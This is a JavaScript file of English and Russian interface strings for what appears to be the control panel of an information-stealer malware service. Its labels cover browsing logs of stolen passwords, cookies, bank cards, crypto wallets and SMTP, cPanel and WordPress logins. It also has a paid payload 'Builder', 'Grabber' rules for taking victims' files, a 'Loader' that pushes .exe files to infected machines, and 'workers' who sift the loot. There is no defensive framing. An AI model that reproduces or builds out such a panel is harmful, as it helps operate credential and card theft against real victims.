export default {
  ENG: {
    titles: {
      registration: "REGISTRATION",
      login: "LOGIN",
      recovery: "RECOVERY",
      home: "DASHBOARD",
      profile: "PROFILE",
      builder: "BUILDER",
      transactions: "TRANSACTIONS",
      allWorkers: "WORKERS",
      workersLogs: "WORKERS LOGS",
      settings: "SETTINGS",
      marks: "MARKS",
      grabber: "GRABBER",
      loader: "LOADER",
      allLogs: "ALL LOGS",
      allFiles: "ALL FILES",
      allPasswords: "ALL PASSWORDS",
      allCards: "ALL BANK CARDS",
      allForDownload: "FOR DOWNLAOD",
      allSMTP: "SMTP",
      allCpanels: "Cpanel`s",
      allWordpress: "WORDPRESS",
      allStats: "STATS",
      allSharedStats: "SHARED STATS"
    },
    registrationPage: {
      header1: "Sign Up",
      header2: "Register new account",
      username: "Username",
      email: "Enter Email",
      password: "Password",
      repeatPassword: "Repeat password",
      signupButton: "SIGN UP",
      link: "You already have account?",
      successRegistration: "You have successfully registered!"
    },
    loginPage: {
      header1: "Log in",
      header2: "Login in account",
      username: "Username",
      password: "Password",
      rememberMe: "Remember Me",
      signinButton: "SIGN IN",
      link1: "Don't you have account yet?",
      link2: "Forgot your password?"
    },
    recoveryPage: {
      header1: "Recovery",
      header2: "Recovery password",
      email: "Enter Email",
      recoveryButton: "RECOVERY",
      link1: "Don't you have account yet?",
      link2: "You already have account?",
      successRecovery: "The password has been sent to your email!"
    },
    sidebar: {
      subscribe: "Subscripion",
      active: "active",
      inactive: "inactive",
      left: "left",
      days: "day(s)",
      dashboard: "Dashboard",
      logs: {
        value: "Logs",
        all: "All",
        files: "Files",
        passwords: "Passwords",
        bankCards: "Bank cards",
        forDownload: "For downlaods",
        smtp: "SMTP",
        cpanels: "Cpanels",
        wordPress: "WordPress",
        stats: "Stats",
      },
      workers: {
        value: "Workers",
        all: "All",
        logs: "Logs"
      },
      settings: {
        value: "Settings",
        settings: "Settings",
        mark: "Mark",
        grabber: "Grabber",
        loader: "Loader",
        profile: "Profile"
      },
      builder: {
        value: "Builder",
        builder: "Builder",
        transactions: "Transactions"
      }
    },
    homePage: {
      header: "Main",
      pathItem1: "Dashboard",
      builderVersion: "BUILDER VERSION",
      builderDate: "Update date",
      BuilderSubscription: "BUILDER SUBSCRIPTION",
      BuilderSubscriptionTo: "To",
      BuilderSubscriptionDays: "d",
      BuilderSubscriptionButton: "More detailed",
      logs: "LOGS",
      logsButton: "Watch",
      balance: "WALLET",
      balanceButton: "Top up",
      last30days: "Last 30 days",
      allLogs: "Total logs",
      commonLogs: "Common logs",
      importantLogs: "Important logs",
      commonLogsLines: "Common logs",
      importantLogsLines: "Important logs",
    },
    profilePage: {
      header: "Profile",
      pathItem1: "Settings",
      pathItem2: "Profile",
      security: "Security",
      settings: "Settings",
      username: "Username",
      password: "Password",
      repeatPassword: "Repeat password",
      saveButton: "Save Changes",
      successPasswordChange: "The password has been successfully changed!"
    },
    builderPage: {
      header: "Builder",
      pathItem1: "Builder",
      pathItem2: "Settings",
      topUp: "Top up",
      enterAmount: "Enter the amount to top up",
      topUpButton: "Top up",
      cancelButton: "Cancel",
      amount: "Amount",
      subscriptionTitle: "Subscription",
      renewSubscription: "Are you sure you want to renew your subscription?",
      yesButton: "Yes!",
      noButton: "No!",
      subscription: "Subscription",
      balance: "Balance",
      refreshBalanceButton: "Refresh balance",
      expiresAt: "The subscription is valid until",
      expired: "Expired",
      renewDate: "Date",
      renewButton: "Renew",
      topUpButton: "Top up balance",
      download: "Download",
      downloadButton: "Download",
      externalLink: "External link",
      notGenerated: "Not generated",
      generateLinkButton: "Generate a link",
      password: "Password",
      passwordNotInstalled: "Not installed",
      builderVersion: "Builder version",
      versionNotInstalled: "Not installed",
      builderUPdates: "Builder updates",
      version: "Version",
      changes: "Changes",
      date: "Date",
      previous: "Previous",
      next: "Next",
      linkCopied: "The link is copied!",
      linkCopyError: "Couldn't copy the link!",
      generateLinkFirst: "First generate the link",
      balanceUpdated: "The balance has been updated!",
      builderLinKUpdateed: "The link to the builder has been updated!",
    },
    transactionsPage: {
      header: "Transactions",
      pathItem1: "Builder",
      pathItem2: "Transactions",
      history: "Transactions history",
      ID: "ID",
      amount: "Amount",
      action: "Action",
      date: "Date",
      previous: "Previous",
      next: "Next",
    },
    allWorkersPage: {
      header: "Workers",
      pathItem1: "Workers",
      pathItem2: "All",
      workers: "Workers",
      addWorker: "Add worker",
      login: "Login",
      ipHistory: "IP history",
      note: "Note",
      date: "Date",
    },
    addWorkerComponent: {
      addWorker: "Add worker",
      username: "Username",
      email: "Email",
      password: "Password",
      note: "Note",
      timeout: "Timeout",
      searchSettings: "Search settings",
      ID: "ID",
      startID: "Start ID",
      IP: "IP",
      allCountrys: "All countrys",
      sites: "Sites",
      note: "Note",
      cookie: "Cookie",
      important: "Important",
      allMark: "All mark",
      paypal: "Paypal",
      filterSettings: "Filter settings",
      wallets: "Wallets",
      bankCards: "Bank cards",
      empty: "Hide empty",
      telegram: "Telegram",
      teoFAplugins: "2fa plugins",
      favorites: "Favorites",
      unique: "Only unique",
      globalDuplicates: "Hide global duplicates",
      notDownloaded: "Not downloaded",
      addWorkerButton: "Add worker",
      closeButton: "Close",
    },
    editWorkerComponent: {
      editWorker: "Add worker",
      username: "Username",
      email: "Email",
      password: "Password",
      note: "Note",
      timeout: "Timeout",
      searchSettings: "Search settings",
      ID: "ID",
      startID: "Start ID",
      IP: "IP",
      allCountrys: "All countrys",
      sites: "Sites",
      note: "Note",
      cookie: "Cookie",
      important: "Important",
      allMark: "All mark",
      paypal: "Paypal",
      filterSettings: "Filter settings",
      wallets: "Wallets",
      bankCards: "Bank cards",
      empty: "Hide empty",
      telegram: "Telegram",
      teoFAplugins: "2fa plugins",
      favorites: "Favorites",
      unique: "Only unique",
      globalDuplicates: "Hide global duplicates",
      notDownloaded: "Not downloaded",
      editWorkerButton: "Edit worker",
      deleteWorkerButton: "Delete worker",
      closeButton: "Close",
    },
    WorkersLogsPage: {
      header: "Workers logs",
      pathItem1: "Workers",
      pathItem2: "Logs",
      actionLogging: "Logging of actions",
      allWorkers: "All workers",
      allActions: "all actions",
      workers: "Worker",
      logid: "LOG ID",
      action: "Action",
      date: "Date",
      previous: "Previous",
      next: "Next",
    },
    settingsPage: {
      header: "Settings",
      pathItem1: "Settings",
      pathItem2: "Current",
      settings: "Settings",
      hwidDayDuplicates: "Block HWID duplicates(1 day)",
      hwidDuplicates: "Block HWID duplicates",
      ipDuplicates: "Block IP duplicates",
      telegram: "Telegram",
      screenshot: "Screenshot",
      cryptoWallets: "Wallets with cryptocurrency",
      netHistory: "Internet History",
      staticMarks: "Static labels",
      saveSettingsButton: "Save Settings",
    },
    marksPage: {
      header: "Marks",
      pathItem1: "Settings",
      pathItem2: "Marks",
      marks: "Marks",
      addMarkButton: "Add mark",
      name: "Name",
      mark: "Mark",
      checkDomains: "Check cookie domains",
      checkPassword: "Check passwords",
      checkHistory: "Check the history",
      have: "Have",
      noHave: "Not have",
      previous: "Previous",
      next: "Next",
    },
    addMarkComponent: {
      addMark: "Add mark",
      name: "Name",
      domains: "Domains",
      devideMarks: "Separate placemarks separated by commas - \",\"",
      color: "Color",
      checkDomains: "Check cookie domains",
      checkPassword: "Check passwords",
      checkHistory: "Check the history",
      addMarkButton: "Add mark",
      closeButton: "Close",
    },
    editMarkComponent: {
      editMark: "Edit mark",
      name: "Name",
      domains: "Domains",
      devideMarks: "Separate placemarks separated by commas - \",\"",
      color: "Color",
      checkDomains: "Check cookie domains",
      checkPassword: "Check passwords",
      checkHistory: "Check the history",
      editMarkButton: "Edit mark",
      deleteMarkButton: "Delete mark",
      closeButton: "Close",
    },
    grabberPage: {
      header: "Grabber",
      pathItem1: "Settings",
      pathItem2: "Grabber",
      grabber: "Grabber",
      addGrabberButton: "Add rule",
      name: "Name",
      folder: "Folder",
      files: "FIles",
      exceptions: "exceptions",
      previous: "Next",
      next: "Previous",
    },
    addGrabberComponent: {
      addGrabber: "Add rule",
      name: "Name",
      folder: "Folder",
      files: "Files",
      divide1: "To separate files, use a line break",
      maxSize: "Maximum size",
      size: "Kb(1 file)",
      recursive: "Collect recursively",
      exceptions: "Exceptions",
      divide2: "To separate files, use \":\"",
      addGrabberButton: "Add rule",
      closeButton: "Close",
    },
    editGrabberComponent: {
      editGrabber: "Edit rule",
      name: "Name",
      folder: "Folder",
      files: "Files",
      divide1: "To separate files, use a line break",
      maxSize: "Maximum size",
      size: "Kb(1 file)",
      recursive: "Collect recursively",
      exceptions: "Exceptions",
      divide2: "To separate files, use \":\"",
      editGrabberButton: "Edit rule",
      deleteGrabberButton: "Delete rule",
      closeButton: "Close",
    },
    loaderPage: {
      header: "Loader",
      pathItem1: "Settings",
      pathItem2: "Loader",
      loader: "Loader",
      addLoaderButton: "Add file",
      id: "ID",
      name: "Name",
      link: "Link",
      startCount: "Starts count",
      previous: "Next",
      next: "Previous",
    },
    addLoaderComponent: {
      addLoader: "Add file",
      name: "Name",
      url: "File URL",
      exe: ".exe file",
      warning: "If nothing is specified , the filter is not applied",
      addLoaderButton: "Add file",
      closeButton: "Close",
    },
    editLoaderComponent: {
      editLoader: "Edit file",
      name: "Name",
      url: "File URL",
      exe: ".exe file",
      warning: "If nothing is specified , the filter is not applied",
      editLoaderButton: "Edit file",
      deleteLoaderButton: "Delete file",
      closeButton: "Close",
    },
    allLogsPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "All",
      logs: "Logs",
      id: "ID",
      fromId: "From ID",
      ip: "IP",
      allCountries: "All countries",
      note: "Note",
      cookie: "Cookie",
      sites: "Sites",
      allImportant: "All",
      allMarks: "All marks",
      wallets: "Wallets",
      cards: "Bank cards",
      hideEmpty: "Hide empty",
      telegram: "Telegram",
      twoFA: "2FA plugin",
      notDownloaded: "Not downloaded",
      favorite: "Favorites",
      unique: "Only unique",
      hideGlobalDuplicates: "Hide global duplicates",
      showText: "Show",
      results: "results",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      data: "Data",
      savedPasswords: "Saved passwords",
      cookieSites: "Sites in cookies",
      note: "Notes",
      logs: "Logs",
      countryAndIp: "Country/IP",
      date: "Date",
      history: "History",
      favoriteLog: "Favourites",
      download: "Download",
      archiveProcess: 'The archives for downloading are being processed!'
    },
    showLogPasswords: {
      passwords: "Saved passwords",
      search: "Search",
      soft: "Soft",
      domain: "Domain",
      login: "Login",
      password: "Password"
    },
    showLogSites: {
      search: "Search",
      site: "Site"
    },
    showLogInformation: {
      information: "Information"
    },
    allFilesPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "Files",
      fiels: "Files",
      id: "ID",
      file: "File",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
    },
    allPasswordsPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "Passwords",
      passwords: "Passwords",
      id: "ID",
      allCountries: "All countries",
      site: "Site",
      login: "Login",
      emptyLogins: "Empty logins",
      emptyPasswords: "Empty passwords",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      soft: "Soft",
      url: "URL",
      password: "Password"
    },
    allCardsPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "Bank cards",
      cards: "Bank cards",
      id: "ID",
      allCountries: "All countries",
      name: "Name",
      number: "Card number",
      emprtyName: "Empty names",
      hideOld: "Hide old cards",
      emptyDate: "Empty date",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      date: "Date"
    },
    allForDownloadPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "For download",
      forDownload: "For download",
      showAll: "Show all",
      inProcess: "In process",
      complete: "Ready for download",
      deleted: "Deleted",
      cancelled: "Canceled",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      id: "ID",
      logs: "Logs",
      archives: "Archives",
      status: "Status",
      date: "Date",
    },
    allSMTPPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "SMTP",
      emails: "Emails",
      showText: "Show",
      results: "results",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      email: 'Email',
      password: "Password",
      SMTP: "SMTP"
    },
    allCpanelsPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "Cpanels",
      cpanels: "Cpanel`s",
      showText: "Show",
      results: "results",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      id: 'Log ID',
      host: "Host",
      login: "Login",
      password: "Password",
      logIn: "Log in",
    },
    allWordpressPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "WordPress",
      wordpress: "WordPress",
      show: (from, to, all) => `Shown from ${from} to ${to} of ${all} results`,
      id: 'Log ID',
      host: "Host",
      login: "Login",
      password: "Password",
      logIn: "Log in",
    },
    allStatsPage: {
      header: "Logs",
      pathItem1: "Logs",
      pathItem2: "Statistics",
      stats: "Statistics",
      allTime: 'For all the time',
      settings: "Settings",
      roundName: "Round name",
      roundCreateButton: "Create a new round",
      day: "Day",
      all: "Logs",
      important: "Important",
      empty: "Empty",
      duplicates: "Duplicates",
      country: "Country",
      mark: 'Mark',
      succesCreated: 'The round has been successfully created!',
    },
    showRoundsComponent: {
      rounds: "Rounds",
      name: "Name",
      date: "Date",
      public: "Public access",
      on: "On",
      off: "Off"
    },
    sharedStatsPage: {
      generalStats: "General stats",
      detailStats: "Detail stats",
      logs: "Logs",
      important: "Important",
      empty: "Empty",
      duplicates: "Duplicates",
      id: "ID",
      CountryAndIP: "Country / IP",
      date: "Date",
    },
  },
  RUS: {
    titles: {
      registration: "РЕГИСТРАЦИЯ",
      login: "АВТОРИЗАЦИЯ",
      recovery: "ВОССТАНОВЛЕНИЕ ПАРОЛЯ",
      home: "ГЛАВНАЯ",
      profile: "ПРОФИЛЬ",
      builder: "BUILDER",
      transactions: "ТРАНЗАКЦИИ",
      allWorkers: "РАБОТНИКИ",
      workersLogs: "ЛОГИ РАБОТНИКОВ",
      settings: "НАСТРОЙКИ",
      marks: "МАРКЕРЫ",
      grabber: "ГРАББЕР",
      loader: "ЛОАДЕР",
      allLogs: "ВСЕ",
      allFiles: "ФАЙЛЫ",
      allPasswords: "ПАРОЛИ",
      allCards: "БАНКОВСКИЕ КАРТЫ",
      allForDownload: "ДЛЯ СКАЧИВАНИЯ",
      allSMTP: "SMTP",
      allCpanels: "Cpanel`s",
      allWordpress: "WORDPRESS",
      allStats: "СТАТИСТИКА",
      allSharedStats: "ПУБЛИЧНАЯ СТАТИСТИКА"
    },
    registrationPage: {
      header1: "Регистрация",
      header2: "Зарегистрировать новый аккаунт",
      username: "Никнейм",
      email: "Почта",
      password: "Пароль",
      repeatPassword: "Повторите пароль",
      signupButton: "Зарегистрироваться",
      link: "У вас уже есть аккаунт?",
      successRegistration: "Вы успешно зарегистрировались!"
    },
    loginPage: {
      header1: "Авторизация",
      header2: "Войти в аккаунт",
      username: "Никнейм",
      password: "Пароль",
      rememberMe: "Запомнить меня",
      signinButton: "Авторизоваться",
      link1: "У вас еще нет аккаунта?",
      link2: "Забыли пароль?"
    },
    recoveryPage: {
      header1: "Восстановление",
      header2: "Восстановить пароль",
      email: "Почта",
      recoveryButton: "Восстановить",
      link1: "У вас еще нет аккаунта?",
      link2: "У вас уже есть аккаунт?",
      successRecovery: "Пароль отправлен вам на почту!"
    },
    sidebar: {
      subscribe: "Подписка",
      active: "активна",
      inactive: "не активна",
      left: "Осталось",
      days: "дня(-ей)",
      dashboard: "Главная",
      logs: {
        value: "Логи",
        all: "Все",
        files: "Файлы",
        passwords: "Пароли",
        bankCards: "Банковские карты",
        forDownload: "Для скачивания",
        smtp: "SMTP",
        cpanels: "Cpanels",
        wordPress: "WordPress",
        stats: "Статистика"
      },
      workers: {
        value: "Работники",
        all: "Все",
        logs: "Логи активности"
      },
      settings: {
        value: "Настройки",
        settings: "Настройки",
        mark: "Метка",
        grabber: "Граббер",
        loader: "Лоадер",
        profile: "Профиль"
      },
      builder: {
        value: "Builder",
        builder: "Builder",
        transactions: "Транзакции"
      }
    },
    homePage: {
      header: "Главная",
      pathItem1: "Панель",
      builderVersion: "ВЕРСИЯ BUILDER",
      builderDate: "Дата обновления",
      BuilderSubscription: "BUILDER ПОДПИСКА",
      BuilderSubscriptionTo: "До",
      BuilderSubscriptionDays: "дн",
      BuilderSubscriptionButton: "Подробнее",
      logs: "ЛОГИ",
      logsButton: "Посмотреть",
      balance: "КОШЕЛЁК",
      balanceButton: "Пополнить",
      last30days: "Последние 30 дней",
      allLogs: "Всего логов",
      commonLogs: "Обычных логов",
      importantLogs: "Важных логов",
      commonLogsLines: "Обычные логи",
      importantLogsLines: "Важные логи",
    },
    profilePage: {
      header: "Профиль",
      pathItem1: "Настройки",
      pathItem2: "Профиль",
      security: "Настройки",
      settings: "Безопасности",
      username: "Никнейм",
      password: "Пароль",
      repeatPassword: "Повторите пароль",
      saveButton: "Сохранить изменения",
      successPasswordChange: "Пароль успешно изменён!"
    },
    builderPage: {
      header: "Builder",
      pathItem1: "Builder",
      pathItem2: "Настройки",
      topUp: "Пополнить",
      enterAmount: "Введите сумму для пополнения",
      topUpButton: "Пополнить",
      cancelButton: "Назад",
      amount: "Сумма",
      subscriptionTitle: "Подписка",
      renewSubscription: "Вы уверены, что хотите продлить подписку?",
      yesButton: "Да!",
      noButton: "Нет!",
      subscription: "Подписка",
      balance: "Баланс",
      refreshBalanceButton: "Обновить баланс",
      expiresAt: "Подписка действительна до",
      expired: "Истекла",
      renewDate: "Срок",
      renewButton: "Продлить",
      topUpButton: "Пополнить баланс",
      download: "Скачать",
      downloadButton: "Скачать",
      externalLink: "Внешняя ссылка",
      notGenerated: "Не сгенерирована",
      generateLinkButton: "Генерировать ссылку",
      password: "Пароль",
      passwordNotInstalled: "Не установлен",
      builderVersion: "Версия Builder",
      versionNotInstalled: "Не установлена",
      builderUPdates: "Обновления Builder",
      version: "Версия",
      changes: "Изменения",
      date: "Дата",
      previous: "Предыдуущая",
      next: "Следующая",
      linkCopied: "Ссылка скопирована!",
      linkCopyError: "Не удалось скопировать ссылку!",
      generateLinkFirst: "Сначала сгенерируйте ссылку",
      balanceUpdated: "Баланс обновлён!",
      builderLinKUpdateed: "Ссылка на builder обновлена!",
    },
    transactionsPage: {
      header: "Список транзакций",
      pathItem1: "Builder",
      pathItem2: "Транзакции",
      history: "История транзакций",
      ID: "ID",
      amount: "Сумма",
      action: "Действие",
      date: "Дата",
      previous: "Предыдуущая",
      next: "Следующая",
    },
    allWorkersPage: {
      header: "Работники",
      pathItem1: "Работники",
      pathItem2: "Все",
      workers: "Работники",
      addWorker: "Добавить работника",
      login: "Логин",
      ipHistory: "История IP",
      note: "Заметка",
      date: "Дата добавления",
    },
    addWorkerComponent: {
      addWorker: "Добавить работника",
      username: "Никнейм",
      email: "Почты",
      password: "Пароль",
      note: "Заметка",
      timeout: "Таймаут",
      searchSettings: "Настройки поиска",
      ID: "ID",
      startID: "Начальный ID",
      IP: "IP",
      allCountrys: "Все страны",
      sites: "Сайты",
      note: "Заметка",
      cookie: "Cookie",
      important: "Важные",
      allMark: "Все метки",
      paypal: "Paypal",
      filterSettings: "Настройки фильтра",
      wallets: "Кошельки",
      bankCards: "Банковские карты",
      empty: "Скрыть пустые",
      telegram: "Телеграм",
      teoFAplugins: "2fa плагины",
      favorites: "Избранные",
      unique: "Только уникальные",
      globalDuplicates: "Скрыть глобальные дубликаты",
      notDownloaded: "Не скачивался",
      addWorkerButton: "Добавить работника",
      closeButton: "Закрыть",
    },
    editWorkerComponent: {
      editWorker: "Редактировать работника",
      username: "Никнейм",
      email: "Почты",
      password: "Пароль",
      note: "Заметка",
      timeout: "Таймаут",
      searchSettings: "Настройки поиска",
      ID: "ID",
      startID: "Начальный ID",
      IP: "IP",
      allCountrys: "Все страны",
      sites: "Сайты",
      note: "Заметка",
      cookie: "Cookie",
      important: "Важные",
      allMark: "Все метки",
      paypal: "Paypal",
      filterSettings: "Настройки фильтра",
      wallets: "Кошельки",
      bankCards: "Банковские карты",
      empty: "Скрыть пустые",
      telegram: "Телеграм",
      teoFAplugins: "2fa плагины",
      favorites: "Избранные",
      unique: "Только уникальные",
      globalDuplicates: "Скрыть глобальные дубликаты",
      notDownloaded: "Не скачивался",
      editWorkerButton: "Редактировать работника",
      deleteWorkerButton: "Удалить работника",
      closeButton: "Закрыть",
    },
    WorkersLogsPage: {
      header: "Логи работников",
      pathItem1: "Работники",
      pathItem2: "Логи",
      actionLogging: "Логирование действий",
      allWorkers: "Все работники",
      allActions: "Все действия",
      workers: "Работник",
      logid: "LOG ID",
      action: "Действие",
      date: "Дата",
      previous: "Предыдуущая",
      next: "Следующая",
    },
    settingsPage: {
      header: "Настройки",
      pathItem1: "Настройки",
      pathItem2: "Текущие",
      settings: "Настройки",
      hwidDayDuplicates: "Блокировать HWID дубликаты(1 день)",
      hwidDuplicates: "Блокировать HWID дубликаты",
      ipDuplicates: "Блокировать IP дубликаты",
      telegram: "Telegram",
      screenshot: "Скриншот",
      cryptoWallets: "Кошельки с криптовалютой",
      netHistory: "История интернета",
      staticMarks: "Статические метки",
      saveSettingsButton: "Сохранить настройки",
    },
    marksPage: {
      header: "Маркеры",
      pathItem1: "Настройки",
      pathItem2: "Маркеры",
      marks: "Метки",
      name: "Название",
      mark: "Метка",
      addMarkButton: "Добавить метку",
      checkDomains: "Проверка доменов cookie",
      checkPassword: "Проверка паролей",
      checkHistory: "Проверка истории",
      have: "Есть",
      noHave: "Нет",
      previous: "Предыдуущая",
      next: "Следующая",
    },
    addMarkComponent: {
      addMark: "Добавить метку",
      name: "Название",
      domains: "Домены",
      devideMarks: "Отдельные метки через запятую - \",\"",
      color: "Цвет",
      checkDomains: "Проверка доменов cookie",
      checkPassword: "Проверка паролей",
      checkHistory: "Проверка истории",
      addMarkButton: "Добавить метку",
      closeButton: "Закрыть",
    },
    editMarkComponent: {
      editMark: "Изменить метку",
      name: "Название",
      domains: "Домены",
      devideMarks: "Отдельные метки через запятую - \",\"",
      color: "Цвет",
      checkDomains: "Проверка доменов cookie",
      checkPassword: "Проверка паролей",
      checkHistory: "Проверка истории",
      editMarkButton: "Изменить метку",
      deleteMarkButton: "Удалить метку",
      closeButton: "Закрыть",
    },
    grabberPage: {
      header: "Граббер",
      pathItem1: "Настройки",
      pathItem2: "Граббер",
      grabber: "Граббер",
      addGrabberButton: "Добавить правило",
      name: "Название",
      folder: "Папка",
      files: "Файлы",
      exceptions: "Исключения",
      previous: "Предыдуущая",
      next: "Следующая",
    },
    addGrabberComponent: {
      addGrabber: "Добавить правило",
      name: "Название",
      folder: "Папка",
      files: "Файлы",
      divide1: "Для разделения файлов используйте перенос строки",
      maxSize: "Максимальный размер",
      size: "Kb(1 файл)",
      recursive: "Собирать рекурсивно",
      exceptions: "Исключения",
      divide2: "Для разделения файлов используется \":\"",
      addGrabberButton: "Добавить правило",
      closeButton: "Закрыть",
    },
    editGrabberComponent: {
      editGrabber: "Изменить правило",
      name: "Название",
      folder: "Папка",
      files: "Файлы",
      divide1: "Для разделения файлов используйте перенос строки",
      maxSize: "Максимальный размер",
      size: "Kb(1 файл)",
      recursive: "Собирать рекурсивно",
      exceptions: "Исключения",
      divide2: "Для разделения файлов используется \":\"",
      editGrabberButton: "Изменить правило",
      deleteGrabberButton: "Удалить правило",
      closeButton: "Закрыть",
    },
    loaderPage: {
      header: "Лоадер",
      pathItem1: "Настройки",
      pathItem2: "Лоадер",
      loader: "Лоадер",
      addLoaderButton: "Добавить файл",
      id: "ID",
      name: "Название",
      link: "Ссылка",
      startCount: "Количество запусков",
      previous: "Предыдуущая",
      next: "Следующая",
    },
    addLoaderComponent: {
      addLoader: "Добавить файл",
      name: "Нвазание",
      url: "URL файла",
      exe: ".exe файл",
      warning: "Если ничего не указано - фильтр не применяется",
      addLoaderButton: "Добавить файл",
      closeButton: "Закрыть",
    },
    editLoaderComponent: {
      editLoader: "Изменить файл",
      name: "Название",
      url: "URL файл",
      exe: ".exe файл",
      warning: "Если ничего не указано - фильтр не применяется",
      editLoaderButton: "Изменить файл",
      deleteLoaderButton: "Удалить файл",
      closeButton: "Закрыть",
    },
    allLogsPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Все",
      logs: "Логи",
      id: "ID",
      fromId: "от ID",
      ip: "IP",
      allCountries: "Все страны",
      note: "Заметка",
      cookie: "Cookie",
      sites: "Сайты",
      allImportant: "Все",
      allMarks: "Все метки",
      wallets: "Кошельки",
      cards: "Банковские карты",
      hideEmpty: "Скрыть пустые",
      telegram: "Телеграм",
      twoFA: "2FA плагин",
      notDownloaded: "Не скачивался",
      favorite: "Избранные",
      unique: "Только уникальны",
      hideGlobalDuplicates: "Скрыть глобальные дубликаты",
      showText: "Показывать",
      results: "результатов",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      data: "Данные",
      savedPasswords: "Сохранённые пароли",
      cookieSites: "Сайты в cookie",
      note: "Заметки",
      logs: "Логи",
      countryAndIp: "Страна/IP",
      date: "Дата добавления",
      history: "История",
      favoriteLog: "Избранное",
      download: "Скачать",
      archiveProcess: 'Архивы для скачивания обрабатываются!'
    },
    showLogPasswords: {
      passwords: "Сохранённые пароли",
      search: "Поиск",
      soft: "Приложение",
      domain: "Домен",
      login: "Логин",
      password: "Пароль"
    },
    showLogSites: {
      search: "Поиск",
      site: "Сайт"
    },
    showLogInformation: {
      information: "Информация"
    },
    allFilesPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Файлы",
      fiels: "Файлы",
      id: "ID",
      file: "Файл",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
    },
    allPasswordsPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Пароли",
      passwords: "Пароли",
      id: "ID",
      allCountries: "Все страны",
      site: "Сайт",
      login: "Логин",
      emptyLogins: "Пустые логины",
      emptyPasswords: "Пустые пароли",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      soft: "Программа",
      url: "URL",
      password: "Пароль"
    },
    allCardsPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Банковские карты",
      cards: "Банковские карты",
      id: "ID",
      allCountries: "Все страны",
      name: "Имя",
      number: "Номер карты",
      emprtyName: "Пустые имена",
      hideOld: "Спрятать старые карты",
      emptyDate: "Пустая дата",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      date: "Дата"
    },
    allForDownloadPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Для скачивания",
      forDownload: "Для скачивания",
      showAll: "Показывать все",
      inProcess: "В процессе",
      complete: "Готовы для скачивания",
      deleted: "Удалены",
      cancelled: "Отменены",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      id: "ID",
      logs: "Логи",
      archives: "Архивы",
      status: "Статус",
      date: "Дата добавления",
    },
    allSMTPPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "SMTP",
      emails: "Emails",
      showText: "Показывать",
      results: "результатов",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      email: 'Email',
      password: "Пароль",
      SMTP: "SMTP"
    },
    allCpanelsPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Cpanels",
      cpanels: "Cpanel`s",
      host: "Хост",
      showText: "Показывать",
      results: "результатов",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      id: 'ID лога',
      host: "Хост",
      login: "Логин",
      password: "Пароль",
      logIn: "Вход",
    },
    allWordpressPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "WordPress",
      wordpress: "WordPress",
      show: (from, to, all) => `Показано с ${from} по ${to} из ${all} результатов`,
      id: 'ID лога',
      host: "Хост",
      login: "Логин",
      password: "Пароль",
      logIn: "Вход",
    },
    allStatsPage: {
      header: "Логи",
      pathItem1: "Логи",
      pathItem2: "Статистика",
      stats: "Статистика",
      allTime: 'За всё время',
      settings: "Настройки",
      roundName: "Название раунда",
      roundCreateButton: "Создать новый раунд",
      day: "День",
      all: "Логов",
      important: "Важных",
      empty: "Пустых",
      duplicates: "Дубликаты",
      country: "Страна",
      mark: 'Метка',
      succesCreated: 'Раунд успешно создан!',
    },
    showRoundsComponent: {
      rounds: "Раунды",
      name: "Название",
      date: "Дата",
      public: "Общий доступ",
      on: "Включить",
      off: "Отключить"
    },
    sharedStatsPage: {
      generalStats: "Общая статистика",
      detailStats: "Подробная статистика",
      logs: "Логи",
      important: "Важные",
      empty: "Пустые",
      duplicates: "Дубликаты",
      id: "id",
      CountryAndIP: "Страна / IP",
      date: "Дата",
    },
  }
}